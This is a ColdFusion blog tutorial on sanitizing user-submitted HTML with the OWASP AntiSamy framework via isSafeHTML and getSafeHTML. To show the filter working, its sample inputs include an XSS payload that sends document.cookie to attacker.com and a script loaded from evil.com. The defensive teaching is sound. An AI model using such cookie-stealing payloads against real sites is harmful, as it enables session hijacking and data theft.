Pavan's ColdFusion Blog: Using Antisamy Framework with ColdFusion 11

Wednesday, April 9, 2014

Using Antisamy Framework with ColdFusion 11

AntiSamy is an OWASP API for sanitizing the HTML/CSS input. ColdFusion 11 provides HTML/CSS sanitation functions which does its job based on the given AntiSamy policy files. If you are familiar with AntiSamy framework, skip to section Integration with ColdFusion.

Need for AntiSamy:

Cross-site scripting (XSS) is one of the most common and prevalent security vulnerability found in web applications. XSS can leverage the vulnerabilities in the web application code which allows attacker to inject and execute malicious code(javascript) into the end-user browser. Some of the serious threats by XSS includes session hijacking by stealing authentication information such as cookies, stealing sensitive data loaded in the web page and performing operations on behalf of the victim etc.

XSS vulnerabilities can be classified into three types – Firstly, DOM based which exists in the clients web page, Secondly; on-Persistent or Reflected is when malicious input supplied is displayed back onto the screen after returning back from the server. And finally the most dangerous XSS vulnerability - Persistent or Second Order or Stored XSS wherein the malicious data supplied is stored in the persistent storage or database. One of the primary attack vector for XSS is not having proper validation/escaping mechanisms in place. To defend such type attacks several encoding/escaping mechanisms need to be used depending on the place where the input needs to be placed in the HTML. ColdFusion provides several encoding/escaping functions which helps in validating the input and prevents from many forms of XSS.

In many websites where application developers wishes to provide an option of posting HTML markup so that users can post formatted and interactive data. In that instance encoding/escaping cannot performed on the posted HTML markup as the input needs to be rendered in the browser. Forums & blogs are places where content posted from one user will be displayed back to other website users. There by not encoding/escaping the unverified input definitely opens up new possibilities for XSS. One can use markup parsers such as BBCode and WikiText which provides alternate set of markup tags similar to HTML. These markup parsers converts these set of tags to equivalent HTML. These parsers can effectively whitelist the allowed formatting tag but using this we can not leverage HTML and forces user to learn new language.

One last option could be to devise an XSD schema file by defining list of allowed html tags and attributes. Convert all the given HTML input to XML and then verify the xml using the XSD schema file. It provides a flexible implementation, whitelisting of tags. But the problem with XSD schema validation is it provides no response or error message to the user and XSD needs to be created for all HTML elements.

AntiSamy Framework:

AntiSamy solves the problem of allowing HTML content and also protecting the application from possible attacks like XSS. AntiSamy is one such framework which can sanitize/validate the given input markup which can contain HTML, CSS according to a given policy file. AntiSamy is an OWASP Open source API that will allow user submitted HTML/CSS and limits the potential malicious content to get through. AntiSamy follows the whitelist approach to get the clean HTML/CSS output markup. Also, it provides user friendly error messages to let the user know what HTML, validation or security errors existed.

AntiSamy policy file is an XML file which defines set of rules like below:

Which HTML tags needs to be removed, filtered, validated or encoded.
Validation rules can be written for HTML tag attribute values using regular expressions and constant values
CSS parsing rules can be written to validate each CSS property individually using regular expressions and constant values.

AntiSamy just validates/sanitizes the input according to the given policy file the protection always depends how strict the policy file is written. For more information on AntiSamy and visit OWASP AntiSamy Project page https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project Check out the AntiSamy developer guide for understanding policy files and how to define them according to the requirement.

AntiSamy uses NekoHTML and the given policy file for validating the given HTML/CSS input markup. NekoHTML is a simple HTML scanner and tag balancer that enables application programmers to parse HTML documents and access the information using standard XML interfaces. The parser can scan HTML files and "fix up" many common mistakes that human (and computer) authors make in writing HTML documents. NekoHTML adds missing parent elements; automatically closes elements with optional end tags; and can handle mismatched inline element tags. After reading the input using NekoHTML antisamy builds a DOM tree out of it then validates all of its nodes with the given policy file.

AntiSamy provides the following boilerplate policy files that you can use (can be downloaded from OWASP project page) and further can be modified to meet your project requirements.

antisamy-slashdot.xml - This policy file only allows strict text formatting, and may be a good choice if users are submitting HTML in a comment thread.

antisamy-ebay.xml – This policy file gives the user a little bit of freedom, and may be a good choice if users are submitting HTML for a large portion of a page.

antisamy-myspace.xml – This policy file gives the user a lot of freedom, and may be a good choice if users are submitting HTML for an entire page.

antisamy-tinymce.xml - This policy file only allows text formatting, and may be a good choice if users are submitting HTML to be used in a blog post.

antisamy-anythinggoes.xml – A very dangerous policy file, this will allow all HTML, CSS and JavaScript. You shouldn’t use this in production.This policy file allows every single HTML and CSS. Not for production use.

When to use AntiSamy:

If you are accepting normal text data from the user use the encoding functions of ESAPI provided by coldfusion for validating and displaying them in the web browser. ColdFusion provides the following list of functions for this purpose:

encodeForHTML, encodeForHTMLAttribute, encodeForCSS, encodeForJavaScript and encodeForURL

If you accept HTML markup from the user use the antisamy functions provided by ColdFusion 11. Before planning to use antisamy, think which tags, attributes and css rules you need. Define the required regular expressions, constant literals for the allowed values in an attribute. If your requirement matches with one of the example policy files given by antisamy modify them so that they can meet your requirement. Devise the policy rules according to your requirements and at the same time keeping XSS in mind.

Integration with ColdFusion:

ColdFusion 11 added new methods that can sanitize/validate the input based on the given AntiSamy policy file. ColdFusion 11 ships a basic AntiSamy policy file which is fairly permissive. This policy file allows most HTML elements, and may be useful if users are submitting full HTML pages. Two functions isSafeHTML and getSafeHTML were added to work with antisamy policy

Function isSafeHTML can be used to validate whether the provided input string is according to the rules defined in the AntiSamy policy. getSafeHTML can be used to get the clean html or the policy violation errors (what wrong went with the input) as per the policy.

getSafeHTML(unsafeHTML [, policyFile], throwOnError])
isSafeHTML(unsafeHTML [, policyFile])

unsafeHTML

     The HTML input markup text to sanitize

policyFile (Optional)

     Specify the path to the AntiSamy policy file. Given path can be an absolute path or a relative to the Application.cfc/cfc.

throwOnError (Optional)

      If set to true and given input violates the allowed HTML rules specified in the policy file an exception will be thrown. The exception message contains the list of violations raised because of the input. If set to false ignores the exception returns the HTML content filtered, cleaned according to the policy rules. Defaults to false.

As you see the policy file for these functions is optional. An AntiSamy policy file can be specified at function, application and server levels. The default server level AntiSamy policy file antisamy-basic.xml can be found at <CF_HOME>\lib\antisamy-basic.xml. To specify the policy file at application level set the application setting this.security.antisamypolicy value to the location of policy file. If no AntiSamy file location is supplied to functions ColdFusion checks if any policy file configured at application level. If configured uses it otherwise uses the server level AntiSamy policy file.

Application.cfc
component
{
    this.security.antisamypolicy = "antisamy.xml"; // Path can be absolute or relative to the application cfc path.
}

Here is an example showing how to use these functions

Examples:

In this example we will be using the policy file antisamy-slashdot.xml from OWASP. The policy file strictly allows only <a> <ol> <ul> <li> <dl> <dt> <dd> <tt> <blockquote> <div> <ecode> <quote> tags and no other css tags are allowed. isSafeHTML validates the input according to policy returns true or false and getSafeHTML sanitizes the input by filtering out and returns the clean HTML markup. As these are examples i am using static text input but when using these functions replace them with relevant form variables.

<cfset inputHTML = "<script>function geturl(){return 'http://attacker.com?cookie='+document.cookie;}</script><b>You have won an IPAD.</b><a href='javascript:geturl()'>Click here to cliam the prize</a>">


<!--- Example1 Check whether input is according to policy rules --->

<cfset isSafe = isSafeHTML(inputHTML, "C:\antisamy-slashdot.xml")>

<cfoutput>is Safe HTML: #isSafe#</cfoutput>

<!--- Example2 Check whether input is according to policy rules --->
<cfset anotherInput = "<div><b>Hello World!!</b><br/>lorem ipsum lorem ipsum</div>">

<cfset isSafe = isSafeHTML(anotherInput , "C:\antisamy-slashdot.xml")>

<cfoutput>is Safe HTML: #isSafe#</cfoutput>
<!--- Example 3: Get Safe HTML By filtering out invalid input using the server level policy antisamy-basic.xml when application level setting is not specified---> 

<cfset safeHTML = getSafeHTML(inputHTML, "",false)> 
<cfoutput> 
  Thanks for submitting the content #safeHTML# <br/> 
</cfoutput> 

<!--- Example 4: Get Safe HTML when no violations were present---> 
<cftry> 
  <cfset safeHTML = getSafeHTML(inputHTML, "C:\antisamy-slashdot.xml", true)> 
     <cfoutput> 
   Thanks for submitting the content #safeHTML# <br/> 
 </cfoutput> 
 <cfcatch type="application"> 
     <cfoutput>Invalid Input markup. Please correct the below errors then submit the input again <br/><br/>#cfcatch.details#</cfoutput> 
 </cfcatch>
 </cftry>
<!--- Example 5: shows how antisamy fixes up invalid HTML (end </p> tag is missing) --->
<cfset inputHTML = "<p>This is <b onclick=“alert(bang!)”>so</b> cool!!<img src=“http://example.com/logo.jpg”><script src=“http://evil.com/attack.js”>">
<cfset safeHTML = getSafeHTML(inputHTML, "",false)> 
<cfoutput>#safeHTML#</cfoutput>

AntiSamy-slashdot policy configured not to allow script tags, executing javascript from anchor tag href attribute there by the input is considered as unsafe. In example1 isSafeHTML returns No. In example 2 the given input contains only div and b tags which are allowed by the policy returns Yes.

<!-- copied parts from the antisamy-slashdot.xml -->

<regexp name="onsiteURL" value="([\p{L}\p{N}\\/\.\?=\#&amp;;\-_~]+|\#(\w)+)">
<regexp name="offsiteURL" value="(\s)*((ht|f)tp(s?)://|mailto:)[\p{L}\p{N}]+[~\p{L}\p{N}\p{Zs}\-_\.@\#\$%&amp;;:,\?=/\+!\(\)]*(\s)*">

<regexp-list>
<regexp name="onsiteURL">
<regexp name="offsiteURL">
</regexp></regexp></regexp-list>

<tag-rules>
<!--  Tags related to JavaScript  -->
<tag action="remove" name="script">

<!--  Anchor and anchor related tags  -->
<tag action="validate" name="a">
<attribute name="href" oninvalid="filterTag">

Example 3 shows how to get clean HTML by filtering out the violations as per the policy. Example 3 gives the output "Thanks for submitting the content You have won an IPAD. Click here to cliam the prize". Script tags were removed from the input and in the given input anchor tag contains an invalid value in href attribute there by it filtered out the anchor tag but keeping the content inside of it. As the tags allowed it was kept as it is.

Example 4 shows how to get the user friendly policy violation messages using getSafeHTML. Example 4 gives the output "The script tag is not allowed for security reasons. This tag should not affect the display of the input. The a tag contained an attribute that we could not process. The href attribute had a value of "javascript:geturl()". This value could not be accepted for security reasons. We have chosen to filter the a tag in order to continue processing the input.". Example 5 shows how getSafeHTML fixes up the invalid HTML.It gives the output as "This is so cool!!" by fixing the end paragraph (p) tag.

Furthur Reading:

https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project
https://code.google.com/p/owaspantisamy/downloads/list
http://nekohtml.sourceforge.net/